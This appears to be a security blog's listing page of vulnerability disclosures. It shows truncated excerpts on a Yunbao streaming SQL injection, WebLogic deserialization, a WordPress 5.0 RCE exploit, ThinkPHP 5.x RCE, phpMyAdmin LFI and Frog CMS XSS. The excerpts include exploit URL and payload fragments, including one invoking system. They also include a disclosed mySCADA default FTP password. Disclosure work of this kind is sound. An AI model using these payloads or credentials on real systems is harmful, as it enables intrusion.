Current category

Vulnerability Disclosures

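Two Injection Vulnerabilities in the Yunbao (云豹) Live-Streaming System

Injection 1: File location: /application/Home/Controller/PlaybackController.class.php Injection URL: http://www.hedysx.com/index.php?g=Home&m=Playback&touid=1 Injection 2: File location: /application/Appapi/Controller/Vi...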

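WebLogic Deserialization Remote Command Execution Vulnerability (CNVD-C-2019-48814)

This is an original 0-day vulnerability reported by Minsheng Bank. There is no patch yet, but there is reason to believe the PoC is already circulating. So far it has clearly affected several large enterprises; fortunately, the overall scope of impact is not large. Please apply the temporary mitigation promptly. WebLogic wls9-async deserialization remote command execution vulnerability ...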

WordPress 5.0 Remote Code Execution

WordPress Core 5.0 - Remote Code Execution Exploit var wpnonce = ''; var ajaxnonce = ''; var wp_attached_file = ''; var imgurl = ''; var postajaxdata = ''; var post_id = 0; var cmd = '<!--?php phpinfo();/*'; var ...

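MacCms (Apple CMS) Injection Vulnerability

This article is reposted from a fellow researcher; the full analysis is here. maccms8_mfb (Apple CMS video-sharing program 8.0 | version released 2017.09.27 Poc #! /usr/bin/python # -*- coding:utf-8 -*- #author:F0rmat import requests import time dict = "1234567890qwertyuiopa...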

Joomla JoomCRM 1.1.1 Injection Vulnerability

# POC: # http://localhost/[PATH]/index.php?option=com_joomcrm&view=contacts&format=raw&loc=deal&tmpl=component&deal_id=[SQL] # GET /[PATH]/index.php?optio...

Frog CMS 0.9.5 Cross-Site Scripting Vulnerability

# Version:0.9.5 # CVE :CVE-2018-20448 # The parameter under /install/index.php is that the Database name has reflective XSS # 1 The Database name , username and password must be correct # 2 You can use the exp: <sc...

thinkphp v5.x Remote Code Execution Vulnerability PoC

20181216 update: 1. Execute phpinfo http://unhonker.com/public/index.php?s=/index/\think\app/invokefunction&function=call_user_func_array&vars[0]=system&...

phpMyAdmin 4.8.1 Local File Inclusion Vulnerability

CVE-2018-12613 # 1. Description: # An issue was discovered in phpMyAdmin 4.8.x before 4.8.2, in which an attacker can include (view and potentially execute) files on the server. The vulnerability comes from a portion...

IE11 Null Pointer Difference

# Date: 2018-11-03 # Vendor: Microsoft Corporation # Product web page: https://www.microsoft.com # Affected version: 11.345.17134.0 (Update Versions: 11.0.90 (KB4462949)) # 11.1387.15063.0 (Upd...

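[ICS Security] mySCADA FTP Weak Password Disclosed: mySCADA myPRO 7

On May 20, 2018, another FTP weak-password vulnerability was disclosed in mySCADA. Affected version: myPRO 7. Weak credentials disclosed this time: username:password = myscada:Vikuk63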
